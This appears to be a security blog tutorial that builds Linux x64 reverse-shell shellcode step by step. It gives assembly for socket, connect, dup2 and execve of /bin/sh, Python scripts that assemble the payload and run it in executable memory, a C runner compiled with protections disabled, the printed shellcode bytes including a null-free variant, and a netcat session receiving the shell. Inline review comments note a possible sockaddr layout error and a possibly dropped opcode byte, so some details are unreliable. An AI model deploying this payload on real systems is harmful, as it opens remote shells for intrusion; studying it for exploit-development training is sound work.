Linux x64 Reverse Shellcode

Previously, we looked at generating execve shellcode. In this article, we will be extending that code to create reverse shell shellcode.

Five steps are needed to do this:

Create a Socket
Create a Sockaddr Struct
Call Connect
Handle Duplication
Call Execve

To call external functions, we will be using syscalls. A syscall is a mechanism that allows a program to request services from the operating system kernel.


Create a Socket

Below is the socket function's signature, along with the parameters we need to set.

// Each argument is annotated with the register that carries it for the syscall;
// the syscall number goes in RAX, and RAX also receives the new descriptor on return.
int socket(        // Syscall number 41         RAX = 41
  int domain,      // Set to AF_INET for IPv4   RDI = 2
  int type,        // SOCK_STREAM for TCP       RSI = 1
  int protocol     // Set to zero for default   RDX = 0
);

The following ASM code will make the system call, and save the socket descriptor to the RDI register.

    // Create a socket: socket(AF_INET, SOCK_STREAM, 0)
    mov rax, 41                // Syscall number for socket
    mov rdi, 2                 // domain   = AF_INET (IPv4)
    mov rsi, 1                 // type     = SOCK_STREAM (TCP)
    xor rdx, rdx               // protocol = 0 (default for the type)
    syscall                    // Make our socket syscall; the result comes back in RAX
    mov rdi, rax               // Keep the socket descriptor in RDI, where connect and dup2 take it as their first argument

Create a Sockaddr Struct

Next, we need to convert the IP address and port we want to connect to into network byte order. This can be done with the following code.

import socket
import struct

ip_address = "127.0.0.1"
port = 4444
family = socket.AF_INET

# The shellcode loads these values as little-endian immediates, so each
# constant printed below is the in-memory byte sequence read back to front.

# inet_aton() already returns the four address octets in network order.
ip_network_order = socket.inet_aton(ip_address)
reversed_ip = ip_network_order[::-1].hex()
print(f"IP Address: 0x{reversed_ip}")

# In memory the struct starts with the family in little-endian (x86-64 host)
# order followed by the port in network (big-endian) order. Packing both with
# explicit byte orders keeps the result independent of the machine running
# this script, unlike socket.htons(), which is a no-op on big-endian hosts.
family_and_port = struct.pack("<H", family) + struct.pack("!H", port)
reversed_port_family = family_and_port[::-1]
print(f"Port + Family: 0x{reversed_port_family.hex()}")

Running this code will give us the values we need for the Sockaddr struct:

python3 convert_ip.py 
IP Address: 0x0100007f
Port + Family: 0x5c110002

We push these values onto the stack, and load the address of the resulting struct into the RSI register.

    // Push socketaddr structure to stack
    // NOTE(review): in 64-bit mode each push below stores 8 bytes, so the 16 bytes
    // at RSP end up as 02 00 11 5c 00 00 00 00 | 7f 00 00 01 00 00 00 00.
    // struct sockaddr_in expects the address at offset 4, which is zero here
    // (0.0.0.0); the 127.0.0.1 bytes land at offset 8, in the padding. Linux appears
    // to treat 0.0.0.0 as the local host, which would explain why the loopback demo
    // still connects - verify. If the address field must be honoured, family, port
    // and address need to be packed into a single 8-byte value.
    push 0x0100007f            // IP address (127.0.0.1; stored little-endian as 7f 00 00 01)
    mov rax, 0x5c110002        // Port and family (stored as 02 00 = AF_INET, 11 5c = port 4444)
    push rax                   // Push the rest of sockaddr
    mov rsi, rsp               // Load address of sockaddr into RSI

Call Connect

The connect function takes the file descriptor of the previously created socket, a pointer to the sockaddr struct, and the length of that struct.

int connect(                   // RAX = 42
  int sockfd,                  // RDI = File descriptor of the socket we created in step 1 (a plain int, not a pointer)
  const struct sockaddr *addr, // RSI = Pointer to the sockaddr struct we created in step 2
  socklen_t addrlen            // RDX = The length of our sockaddr structure (16)
);

We can call connect using the following ASM code.

    // Call connect(sockfd, &sockaddr, 16)
    // RDI (socket descriptor) and RSI (sockaddr pointer) were loaded by the previous steps.
    mov rdx, 16                // Length of sockaddr
    mov rax, 42                // Syscall number for connect
    syscall                    // Perform connect syscall

At this point, the code should successfully connect back to us.


Handle Duplication

Next, we use dup2 to duplicate our socket descriptor onto the stdin, stdout and stderr file descriptors (0, 1 and 2). This ensures any I/O is redirected over our network socket.

int dup2(     // RAX = 33 (syscall number for dup2)
  int oldfd,  // RDI = Our existing socket file descriptor
  int newfd   // RSI = Descriptor to replace: STDIN (0), STDOUT (1), STDERR (2)
);

We can implement this using a simple loop.

    // Redirect stdin, stdout, stderr to the socket: dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    // RDI still holds the socket descriptor saved after the socket call.
    mov rsi, 0                 // Start with newfd = 0 (stdin)
    dup_loop:
        mov rax, 33            // Syscall number for dup2 (reloaded every pass: RAX receives each syscall's result)
        syscall                // Duplicate the socket descriptor onto descriptor RSI
        inc rsi                // Increment rsi (0 -> 1 -> 2)
        cmp rsi, 3             // Check if all descriptors are redirected
        jne dup_loop           // Repeat until stdin, stdout, stderr are done

Call Execve

Finally, we can call execve to replace the current process with /bin/sh. Since STDIN, STDOUT and STDERR are already redirected to the network socket, this will yield a shell!

    // Call execve("/bin//sh", NULL, NULL)
    xor rsi,rsi                // Zero RSI (argument vector = NULL). The zero also supplies the string terminator.
    push rsi                   // Push 8 zero bytes: the NUL terminator for the path string
    mov rdi,0x68732f2f6e69622f // "/bin//sh" as one little-endian 8-byte constant (the extra '/' pads it to 8 bytes)
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin//sh string
    pop rdi                    // Pop the pointer to the /bin//sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector = NULL)
    push 59                    // Push the execve syscall number (59)
    pop rax                    // Pop the syscall number into RAX
    syscall                    // Make our execve system call

Putting it all Together

The following Python code will generate our shellcode. Note that when running the code in GDB, you may need to exit GDB before the shell spawns properly.

import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess

# Payload listing handed to Keystone. The instruction stream is deliberately
# left untouched so the assembled bytes stay the same; only the inline
# comments were corrected (the execve syscall number is loaded into RAX, and
# the path string is "/bin//sh").
asm_code = """
    int3                       // Software breakpoint. Leave this here. It will be removed from the printed output.

    // Create a socket: socket(AF_INET, SOCK_STREAM, 0)
    mov rax, 41                // Syscall number for socket
    mov rdi, 2                 // AF_INET
    mov rsi, 1                 // SOCK_STREAM
    xor rdx, rdx               // Protocol 0
    syscall                    // Make our socket syscall
    mov rdi, rax               // Save the socket file descriptor

    // Push socketaddr structure to stack
    // NOTE(review): each push stores 8 bytes, so the address bytes land at offset 8
    // of the struct and the address field at offset 4 stays zero (0.0.0.0). That
    // appears to resolve to the local host on Linux - verify before pointing this
    // at any address other than loopback.
    push 0x0100007f            // IP address (127.0.0.1; stored little-endian as 7f 00 00 01)
    mov rax, 0x5c110002        // Port and family (port=4444, AF_INET)
    push rax                   // Push the rest of sockaddr
    mov rsi, rsp               // Load address of sockaddr into rsi

    // Call connect(sockfd, &sockaddr, 16)
    mov rdx, 16                // Length of sockaddr
    mov rax, 42                // Syscall number for connect
    syscall                    // Perform connect syscall

    // Redirect stdin, stdout, stderr to the socket
    mov rsi, 0                 // Start with descriptor 0 (stdin)
    dup_loop:
        mov rax, 33            // Syscall number for dup2 (reloaded every pass: RAX receives each result)
        syscall                // Duplicate socket file descriptor
        inc rsi                // Increment rsi (0 -> 1 -> 2)
        cmp rsi, 3             // Check if all descriptors are redirected
        jne dup_loop           // Repeat until stdin, stdout, stderr are done

    // Call execve("/bin//sh", NULL, NULL)
    xor rsi,rsi                // Zero RSI (argument vector). Also supplies the string terminator.
    push rsi                   // Push 8 zero bytes to terminate the path string
    mov rdi,0x68732f2f6e69622f // /bin//sh string to RDI
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin//sh string
    pop rdi                    // Pop the pointer to the /bin//sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector)
    push 59                    // Push the execve syscall number
    pop rax                    // Syscall number into RAX
    syscall                    // make our execve system call

"""
 
# Assemble the listing for x86 in 64-bit mode; the second value returned by
# asm() is not used below.
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)

# Spell every byte as a literal \xNN escape so the text can be pasted into a C string.
formatted_hex = ''.join([f'\\x{byte:02x}' for byte in machine_code])

# Print shellcode and size, without the software breakpoint: the leading int3
# is one byte, i.e. the first four characters of the escaped text.
print(f"Shellcode: {formatted_hex[4:]}")
print(f"Shellcode length: {num_bytes - 1}")
input("Press any key to continue...")

# Copy the full payload (breakpoint included) into an anonymous page that is
# readable, writable and executable.
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)

pid = os.getpid()
print(f"Process ID: {pid}")

# Look up the page's address once; it is used both for the gdb breakpoint
# and for the callable that jumps into the payload.
payload_address = ctypes.addressof(ctypes.c_char.from_buffer(mem))
mem_address = hex(payload_address)
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"

# Treat the page as a C function taking no arguments and returning nothing.
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(payload_address)
 
def execute_machine_code() -> None:
    """Announce the run, wait three seconds, then call the mapped payload.

    Used as the target of the worker thread so the main thread stays free to
    start gdb. Reads the module-level ``mem_ptr`` callable.
    """
    print("Executing machine code asynchronously...")
    # Presumably gives the gdb session started by the main thread time to
    # attach before the payload's int3 is reached.
    time.sleep(3)
    mem_ptr()
 
# Run the payload on a worker thread; it sleeps first, leaving the main thread
# free to start the debugger.
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()

print("Running GDB")
# Attaches gdb to this process using the command built earlier; os.system()
# returns only once gdb has exited.
os.system(gdb_command)

# Wait for the worker thread to finish, then release the executable mapping.
execution_thread.join()
mem.close()

Running the code produces our shellcode:

./bin/python3 exploit.py  
Shellcode: \xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 110
Press any key to continue...

The shellcode created can be imported into a C runner for execution.

/*
 * Minimal shellcode runner: copies the payload into a local array and calls it
 * as a function.
 *
 * The array lives on the stack, so the stack must be executable for the call to
 * work (see the -z execstack flag in the compile command). The payload contains
 * 0x00 bytes, which is fine for an array initialiser but means it must not be
 * handled with strlen/strcpy-style string functions.
 *
 * NOTE(review): the string starts with c7 c0 29 ..., without the 0x48 prefix
 * that the other `mov r64, imm32` encodings in it carry (e.g. 48 c7 c7 02 ...),
 * so a leading byte may have been lost when the output was trimmed. As written
 * the first instruction decodes as `mov eax, 41`, which should still leave 41
 * in RAX - verify against freshly generated output.
 */
int main(int argc, char **argv)
{
    char code[] = "\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05";
    /* Reinterpret the byte array as a function taking no arguments. */
    int (*func)();
    func = (int (*)()) code;
    /* Jump into the payload; on success execve replaces the process and this never returns. */
    (int)(*func)();
    return 0;
}

This can be compiled with:

gcc runner.c -o runner -fno-stack-protector -z execstack -no-pie

Setting up a netcat listener and executing the code, we should receive our shell.

nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60284
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(vboxsf)

Going Null Free

There are a number of modifications that need to be made to make the shellcode null free. I’ve implemented these below. This adds 8 bytes to the resulting shellcode.

import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess

# Null-free variant of the payload listing handed to Keystone. Lines marked
# (NULL) are the original instructions whose encodings contain 0x00 bytes;
# they are kept as comments next to their replacements. The instruction
# stream is unchanged; only comments and indentation were tidied.
asm_code = """
    int3                       // Software breakpoint. Leave this here. It will be removed from the printed output.

    // Create a socket: socket(AF_INET, SOCK_STREAM, 0)
    //mov rax, 41              // Syscall number for socket (NULL)
    push 41                    // null free: push the small constant...
    pop rax                    // ...and pop it into RAX
    //mov rdi, 2               // AF_INET (NULL)
    push 2                     // null free
    pop rdi                    // null free
    //mov rsi, 1               // SOCK_STREAM (NULL)
    push 1                     // null free
    pop rsi                    // null free
    xor rdx, rdx               // Protocol 0
    syscall                    // Make our socket syscall
    mov rdi, rax               // Save the socket file descriptor

    // Push socketaddr structure to stack
    // NOTE(review): each push stores 8 bytes, so the address bytes land at offset 8
    // of the struct and the address field at offset 4 stays zero (0.0.0.0). That
    // appears to resolve to the local host on Linux - verify before pointing this
    // at any address other than loopback.
    //push 0x0100007f          // IP address (127.0.0.1 in network byte order) (NULL)
    mov rax, 0x11111111ffffffff // Encode the address without null bytes:
    mov rbx, 0x11111111FEFFFF80 // 0x11111111ffffffff - 0x11111111feffff80 = 0x0100007f
    sub rax, rbx
    push rax

    //mov rax, 0x5c110002      // Port and family (port=4444, AF_INET) (NULL)
    mov rax, 0x11111111ffffffff // Same trick for port and family:
    mov rbx, 0x11111111A3EEFFFD // 0x11111111ffffffff - 0x11111111a3eefffd = 0x5c110002
    sub rax, rbx
    push rax                   // Push the rest of sockaddr
    mov rsi, rsp               // Load address of sockaddr into rsi

    // Call connect(sockfd, &sockaddr, 16)
    //mov rdx, 16              // Length of sockaddr (NULL)
    push 16
    pop rdx
    //mov rax, 42              // Syscall number for connect (NULL)
    push 42
    pop rax
    syscall                    // Perform connect syscall

    // Redirect stdin, stdout, stderr to the socket
    //mov rsi, 0               // Redirect stdin (NULL)
    xor rsi,rsi                // Start with descriptor 0 (stdin)
    dup_loop:
        //mov rax, 33          // Syscall number for dup2 (NULL)
        push 33
        pop rax
        syscall                // Duplicate socket file descriptor
        inc rsi                // Increment rsi (0 -> 1 -> 2)
        cmp rsi, 3             // Check if all descriptors are redirected
        jne dup_loop           // Repeat until stdin, stdout, stderr are done

    // Call execve("/bin//sh", NULL, NULL)
    xor rsi,rsi                // Zero RSI (argument vector). Also supplies the string terminator.
    push rsi                   // Push 8 zero bytes to terminate the path string
    mov rdi,0x68732f2f6e69622f // /bin//sh string to RDI
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin//sh string
    pop rdi                    // Pop the pointer to the /bin//sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector)
    push 59                    // Push the execve syscall number
    pop rax                    // Syscall number into RAX
    syscall                    // make our execve system call

"""
 
# Assemble the listing for x86 in 64-bit mode; the second value returned by
# asm() is not used below.
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)

# Spell every byte as a literal \xNN escape so the text can be pasted into a C string.
formatted_hex = ''.join([f'\\x{byte:02x}' for byte in machine_code])

# Print shellcode and size, without the software breakpoint: the leading int3
# is one byte, i.e. the first four characters of the escaped text.
print(f"Shellcode: {formatted_hex[4:]}")
print(f"Shellcode length: {num_bytes - 1}")
input("Press any key to continue...")

# Copy the full payload (breakpoint included) into an anonymous page that is
# readable, writable and executable.
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)

pid = os.getpid()
print(f"Process ID: {pid}")

# Look up the page's address once; it is used both for the gdb breakpoint
# and for the callable that jumps into the payload.
payload_address = ctypes.addressof(ctypes.c_char.from_buffer(mem))
mem_address = hex(payload_address)
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"

# Treat the page as a C function taking no arguments and returning nothing.
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(payload_address)
 
def execute_machine_code() -> None:
    """Announce the run, wait three seconds, then call the mapped payload.

    Used as the target of the worker thread so the main thread stays free to
    start gdb. Reads the module-level ``mem_ptr`` callable.
    """
    print("Executing machine code asynchronously...")
    # Presumably gives the gdb session started by the main thread time to
    # attach before the payload's int3 is reached.
    time.sleep(3)
    mem_ptr()
 
# Run the payload on a worker thread; it sleeps first, leaving the main thread
# free to start the debugger.
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()

print("Running GDB")
# Attaches gdb to this process using the command built earlier; os.system()
# returns only once gdb has exited.
os.system(gdb_command)

# Wait for the worker thread to finish, then release the executable mapping.
execution_thread.join()
mem.close()
                   

This produces the following shellcode.

./bin/python3 null_free.py                                     
Shellcode: \x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\x80\xff\xff\xfe\x11\x11\x11\x11\x48\x29\xd8\x50\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\xfd\xff\xee\xa3\x11\x11\x11\x11\x48\x29\xd8\x50\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xf2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 118

In Conclusion

The script could be modified further to include dynamic IP address and port generation, although I’ll leave that as an exercise for the reader 🙂